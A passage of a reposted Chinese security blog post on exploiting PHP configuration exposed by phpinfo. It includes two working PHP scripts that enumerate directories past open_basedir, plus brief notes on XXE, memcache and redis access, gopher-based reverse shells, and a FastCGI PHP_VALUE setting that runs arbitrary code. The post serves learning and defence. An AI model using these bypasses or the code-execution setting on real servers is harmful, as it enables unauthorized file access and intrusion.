文章插图
2、realpath列举目录
利用realpath对传入路径的回显不同加上通配符进行列举
本地环境linux就没有进行测试 。
<?phpini_set('open_basedir', dirname(__FILE__));printf("<b>open_basedir: %s</b><br />", ini_get('open_basedir'));set_error_handler('isexists');$dir = 'd:/test/';$file = '';$chars = 'abcdefghijklmnopqrstuvwxyz0123456789_';for ($i=0; $i < strlen($chars); $i++) {$file = $dir . $chars[$i] . '<><';realpath($file);}function isexists($errno, $errstr){$regexp = '/File((.*)) is not within/';preg_match($regexp, $errstr, $matches);if (isset($matches[1])) {printf("%s <br/>", $matches[1]);}}?>
首先设置open_basedir为当前目录,并枚举d:/test/目录下的所有文件 。
将错误处理交给isexists函数,在isexists函数中匹配出目录名称,并打印出来 。
3、SplFileInfo::getRealPath列举目录
不需要考虑open_basedir开不开起 。
<?phpini_set('open_basedir', dirname(__FILE__));printf("<b>open_basedir: %s</b><br />", ini_get('open_basedir'));$basedir = 'D:/test/';$arr = array();$chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for ($i=0; $i < strlen($chars); $i++) {$info = new SplFileInfo($basedir . $chars[$i] . '<><');$re = $info->getRealPath();if ($re) {dump($re);}}function dump($s){echo $s . '<br/>';ob_flush();flush();}?>
还有GD库imageftbbox/imagefttext列举目录bindtextdomain暴力猜解目录,基本也都是要暴力破解,效率比较低 。
还有这篇文章php5全版本绕过open_basedir读文件脚本给跪了
https://www.leavesongs.com/bypass-open-basedir-readfile.html
三.扩展
imagick
这个的远程执行
libxml
libxml 2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理,会导致XXE 。
memcache
Memcache未授权访问漏洞利用及修复:
http://blog.nsfocus.net/memcache-unauthorized-access-exploit/
redis
这个不多说了……
session
xdebug
GOPHER
利用 Gopher 协议拓展攻击面:
https://blog.chaitin.cn/gopher-attack-surfaces/
看了下尝试复现没有成功,我的理解是首先要支持gopher协议,然后找到一个能执行curl会话的参数,构造gopher格式的payload以post格式去执行反弹shell 。(并没有看懂是怎么利用的)
fastcgi
https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html#php-fpmfastcgi
通过fastcgi传入环境变量,设置
'PHP_VALUE': 'auto_prepend_file =php://input','PHP_ADMIN_VALUE': 'allow_url_include = On'
将执行的代码放在body中执行任意代码 。
四.总结从刚接触安全的时候就知道phpinfo里有很重要的信息,然而就在前几天我还直接提了个信息泄露(还撞了,丢脸),复现完真的学到很多 。
参考链接:
https://www.freebuf.com/articles/web/79830.html
http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0151653.html
https://bbs.ichunqiu.com/thread-3234-1-1.html
作者:HACK-Learn 转载自 https://www.secpulse.com/archives/117762.html
原文地址
作者Phyb0x,zeroyu
http://zeroyu.xyz/2018/11/13/what-phpinfo-can-tell-we/
【phpinfo信息利用】
推荐阅读
- 商务舱空姐知道你的信息吗 空姐知道旅客的哪些信息
- 茶行业如何利用全流程服务体系实现品牌突围
- 利用Zabbix监控工具自动帮我们检测目标网络状况
- 江苏茶的利用溯源
- App违规收集个人信息认定标准来了!这9种行为要注意
- 漏洞验证和利用代码编写指南
- 人口普查会不会泄露个人信息 人口普查会泄露隐私吗
- Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程
- 漏洞利用复现,看看黑客如何入侵服务器
- 第五街楼盘信息介绍